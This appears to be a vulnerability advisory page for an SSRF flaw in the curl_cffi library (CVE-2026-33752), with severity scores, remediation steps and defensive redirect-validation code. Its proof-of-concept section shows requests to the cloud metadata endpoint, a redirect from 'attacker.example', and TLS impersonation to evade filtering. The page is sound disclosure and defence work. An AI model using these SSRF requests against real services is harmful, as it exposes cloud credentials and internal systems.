CVE-2026-33752

HIGH
2026-04-03 https://github.com/lexiforest/curl_cffi GHSA-qw2m-4pqf-rmpp
8.6
CVSS 3.1

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

CVE Published: Apr 03, 2026 - 21:36 (nvd)
Analysis Generated: Apr 03, 2026 - 22:15 (vuln.today)
Patch Released: Apr 04, 2026 - 02:30 (nvd); patch available

Description

### Summary

curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

### Details

The issue comes from how curl_cffi handles outbound requests:

- User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
- Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
- There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can:

- Provide a URL pointing to an attacker-controlled server
- Return a redirect response pointing to an internal service
- Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block.

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

### PoC

1. Direct internal request

```
import curl_cffi

resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
```

2. Redirect to internal service

Attacker server:

```
GET /test → 302
Location: http://169.254.169.254/latest/meta-data/
```

Victim code:

```
import curl_cffi

resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
```

Result:

- Initial request goes to the attacker server
- A redirect is returned
- libcurl follows the redirect automatically
- The internal metadata endpoint is accessed

3. With TLS impersonation

```
import curl_cffi

resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome",
)
```

In some environments, this may help the request bypass TLS-based filtering controls.

### Impact

An attacker who can control the requested URL may be able to:

- Access internal network services
- Reach cloud metadata endpoints and retrieve sensitive information
- Bypass certain outbound filtering mechanisms (depending on environment)

This corresponds to CWE-918 Server-Side Request Forgery.

Analysis

Server-Side Request Forgery in the curl_cffi Python library allows unauthenticated remote attackers to access internal network resources and cloud metadata endpoints via attacker-controlled redirect chains. The library passes user-supplied URLs directly to libcurl without validating destination IP ranges and follows redirects automatically (CURLOPT_FOLLOWLOCATION enabled), enabling access to services like the AWS/GCP metadata APIs (169.254.169.254). …


Remediation

Within 24 hours: Identify all applications and services using curl_cffi library via dependency scanning (pip freeze, requirements.txt, lock files); document affected versions and deployment contexts. Within 7 days: Implement URL validation controls (whitelist permitted domains, reject private IP ranges 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16) at application layer; disable automatic redirect following where functionally possible via curl_cffi configuration. …
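The remediation above (allow-list permitted hosts, reject private ranges, stop following redirects inside libcurl) is what an application-layer guard looks like in practice. The following is an added example written for this page, not code from curl_cffi or its maintainers: it resolves each hostname before use, rejects any address in a blocked range, and follows redirects hop by hop in Python so every Location target is re-validated. It goes slightly beyond the ranges listed in the remediation text by also blocking loopback, unspecified, link-local and unique-local addresses, including IPv4-mapped IPv6 forms. The DNS table and HTTP responses at the bottom are constructed stand-ins so the logic runs offline; `curl_cffi_fetch` is an adapter that assumes `curl_cffi.requests.get` accepts `allow_redirects=False` in the same way python-requests does, which you should confirm against the version you deploy.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Optional
from urllib.parse import urljoin, urlparse

# Ranges from the remediation text plus loopback, unspecified, link-local
# and unique-local equivalents (IPv4 and IPv6).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


class SSRFBlocked(Exception):
    """A URL (or a redirect hop) targets a destination the policy forbids."""


def ip_is_blocked(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is the metadata address in IPv6 clothing;
    # unwrap IPv4-mapped addresses so the IPv4 rules apply to them as well.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def system_resolver(host: str) -> list[str]:
    """Real DNS lookup: every address the client could end up connecting to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_url(url: str, resolver: Callable[[str], Iterable[str]] = system_resolver,
                 allowed_hosts: Optional[set[str]] = None) -> list[str]:
    """Reject non-HTTP schemes, hosts off the allow-list, and any host whose
    resolved addresses include a blocked range. Returns the resolved IPs."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise SSRFBlocked(f"scheme not allowed: {parsed.scheme!r}")
    host = parsed.hostname
    if not host:
        raise SSRFBlocked("URL has no host")
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        raise SSRFBlocked(f"host not on allow-list: {host}")
    try:
        ips = [str(ipaddress.ip_address(host))]   # literal IP, no DNS needed
    except ValueError:
        try:
            ips = list(resolver(host))
        except socket.gaierror as exc:
            raise SSRFBlocked(f"cannot resolve {host}: {exc}") from exc
    if not ips:
        raise SSRFBlocked(f"no addresses for {host}")
    blocked = [ip for ip in ips if ip_is_blocked(ip)]
    if blocked:   # one bad record is enough: the client may pick any of them
        raise SSRFBlocked(f"{host} resolves to blocked address(es): {blocked}")
    return ips


def fetch_checked(url: str, fetch, resolver=system_resolver,
                  allowed_hosts: Optional[set[str]] = None, max_hops: int = 5):
    """Follow redirects in Python, validating every hop, instead of letting
    libcurl follow them (the CURLOPT_FOLLOWLOCATION path from the advisory).
    `fetch(url)` must NOT follow redirects; it returns (status, headers, body)."""
    hops = [url]
    for _ in range(max_hops + 1):
        validate_url(url, resolver, allowed_hosts)
        status, headers, body = fetch(url)
        location = next((v for k, v in headers.items() if k.lower() == "location"), None)
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)   # also resolves relative Location values
            hops.append(url)
            continue
        return status, body, hops
    raise SSRFBlocked(f"too many redirects: {hops}")


def curl_cffi_fetch(url: str):
    """Adapter for real use. ASSUMED API: curl_cffi.requests.get accepts
    allow_redirects=False like python-requests; verify against your version."""
    from curl_cffi import requests   # lazy import so the example runs without it
    resp = requests.get(url, allow_redirects=False)
    return resp.status_code, dict(resp.headers), resp.content


# Constructed, offline stand-ins for DNS and HTTP (not real hosts or records).
FAKE_DNS = {
    "attacker.example": ["203.0.113.10"],
    "api.example": ["198.51.100.7"],
    "rebind.example": ["203.0.113.11", "169.254.169.254"],   # one bad A record
}
FAKE_RESPONSES = {
    "https://attacker.example/test": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "https://api.example/old": (302, {"location": "/new"}, b""),
    "https://api.example/new": (200, {}, b"ok"),
}


def fake_resolver(host: str) -> list[str]:
    return FAKE_DNS[host]


def fake_fetch(url: str):
    return FAKE_RESPONSES[url]
```

With `fake_fetch` and `fake_resolver`, `fetch_checked("https://attacker.example/test", ...)` raises `SSRFBlocked` at the second hop, which is exactly the step the advisory says libcurl performs silently, while the benign `/old` to `/new` chain completes. Two caveats a practitioner should keep in mind: resolving and then connecting separately leaves a DNS-rebinding window between the check and the connection, so in production pin the connection to the validated address (or validate at connect time); and the guard only holds if the underlying client really does not follow redirects itself, so confirm the redirect setting rather than assuming it.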


Priority Score

43 (KEV: 0, EPSS: +0.0, CVSS: +43, POC: 0)
